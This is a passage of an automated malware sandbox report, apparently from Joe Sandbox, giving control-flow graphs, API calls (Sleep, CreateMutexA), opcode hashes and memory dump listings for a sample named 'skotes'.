                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: dab9ba8e0373bda77596a9009755899f1a57103894095504d76ea27a2a3acaee
                                                                                                                                                                                                                                                                                          • Instruction ID: 092e381ce80107636e326e462ca54e0211b8edd8e161f66a296ca38c69987ac2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dab9ba8e0373bda77596a9009755899f1a57103894095504d76ea27a2a3acaee
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5314A71B001419BEB189B7EDD89BDDB762EF85320F20421DE4149B2D5D73A8980AF16

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 124 fba418-fba438 128 fba43a-fba446 124->128 129 fba466-fba482 124->129 130 fba448-fba456 128->130 131 fba45c-fba463 call fcd663 128->131 132 fba4b0-fba4cf 129->132 133 fba484-fba490 129->133 130->131 136 fba93f-fba949 call fe6c6a * 2 130->136 131->129 134 fba4fd-fba916 call fc80c0 132->134 135 fba4d1-fba4dd 132->135 138 fba492-fba4a0 133->138 139 fba4a6-fba4ad call fcd663 133->139 140 fba4df-fba4ed 135->140 141 fba4f3-fba4fa call fcd663 135->141 155 fba94e 136->155 156 fba949 call fe6c6a 136->156 138->136 138->139 139->132 140->136 140->141 141->134 157 fba953-fba994 Sleep CreateMutexA 155->157 158 fba94e call fe6c6a 155->158 156->155 160 fba9a7-fba9a8 157->160 161 fba996-fba998 157->161 158->157 161->160 162 fba99a-fba9a5 161->162 162->160
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2700b9dcb65e361efe672c1b5bab7765f46769fe79191285535c00ef00ef7e9a
                                                                                                                                                                                                                                                                                          • Instruction ID: 6cbe9141988f480f688c222f7194ef4b5ea1a525725ddf154609a926466ceced
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2700b9dcb65e361efe672c1b5bab7765f46769fe79191285535c00ef00ef7e9a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31313971B00144DBEB18EB7EDD8DBEDB761EF81320F204219E418DB2D5D77A8980AB56

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 164 fba54d-fba56d 168 fba59b-fba5b7 164->168 169 fba56f-fba57b 164->169 172 fba5b9-fba5c5 168->172 173 fba5e5-fba604 168->173 170 fba57d-fba58b 169->170 171 fba591-fba598 call fcd663 169->171 170->171 178 fba944-fba949 call fe6c6a 170->178 171->168 174 fba5db-fba5e2 call fcd663 172->174 175 fba5c7-fba5d5 172->175 176 fba632-fba916 call fc80c0 173->176 177 fba606-fba612 173->177 174->173 175->174 175->178 181 fba628-fba62f call fcd663 177->181 182 fba614-fba622 177->182 192 fba94e 178->192 193 fba949 call fe6c6a 178->193 181->176 182->178 182->181 194 fba953-fba994 Sleep CreateMutexA 192->194 195 fba94e call fe6c6a 192->195 193->192 198 fba9a7-fba9a8 194->198 199 fba996-fba998 194->199 195->194 199->198 200 fba99a-fba9a5 199->200 200->198
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6ab8e425ee57e070e41acdd8b07f17fa8749fda8ac06c01ee6b711c018ac846a
                                                                                                                                                                                                                                                                                          • Instruction ID: eb053906435d46ee256cfcfd589a18f382ca93a757e6c109320ef65fd683ea37
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ab8e425ee57e070e41acdd8b07f17fa8749fda8ac06c01ee6b711c018ac846a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1316A71B001448BEB18DB7ECD89BECB762EF85324F24421DE454EB2C5CB398980EB16

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 202 fba682-fba6a2 206 fba6d0-fba6ec 202->206 207 fba6a4-fba6b0 202->207 210 fba71a-fba739 206->210 211 fba6ee-fba6fa 206->211 208 fba6b2-fba6c0 207->208 209 fba6c6-fba6cd call fcd663 207->209 208->209 214 fba949 208->214 209->206 212 fba73b-fba747 210->212 213 fba767-fba916 call fc80c0 210->213 216 fba6fc-fba70a 211->216 217 fba710-fba717 call fcd663 211->217 218 fba749-fba757 212->218 219 fba75d-fba764 call fcd663 212->219 222 fba94e 214->222 223 fba949 call fe6c6a 214->223 216->214 216->217 217->210 218->214 218->219 219->213 226 fba953-fba994 Sleep CreateMutexA 222->226 227 fba94e call fe6c6a 222->227 223->222 234 fba9a7-fba9a8 226->234 235 fba996-fba998 226->235 227->226 235->234 236 fba99a-fba9a5 235->236 236->234
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f94a348eee23b709daa052fff5ed2db85839b2396701df853faad82d97190799
                                                                                                                                                                                                                                                                                          • Instruction ID: 982c01431d941176154f7be0e50aa8dac4627bbfca2e9d859a18f73de37393f5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f94a348eee23b709daa052fff5ed2db85839b2396701df853faad82d97190799
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82316A71B041449BEB189B79CD89BDDB762EB81320F24421DE414DB2D5CB398880EB12

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 238 fb9adc-fb9ae8 239 fb9aea-fb9af8 238->239 240 fb9afe-fb9b27 call fcd663 238->240 239->240 241 fba917 239->241 248 fb9b29-fb9b35 240->248 249 fb9b55-fb9b57 240->249 243 fba953-fba994 Sleep CreateMutexA 241->243 244 fba917 call fe6c6a 241->244 250 fba9a7-fba9a8 243->250 251 fba996-fba998 243->251 244->243 252 fb9b4b-fb9b52 call fcd663 248->252 253 fb9b37-fb9b45 248->253 254 fb9b59-fba916 call fc80c0 249->254 255 fb9b65-fb9d91 call fc7a00 call fb5c10 call fb8b30 call fc8220 call fc7a00 call fb5c10 call fb8b30 call fc8220 249->255 251->250 256 fba99a-fba9a5 251->256 252->249 253->241 253->252 256->250
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
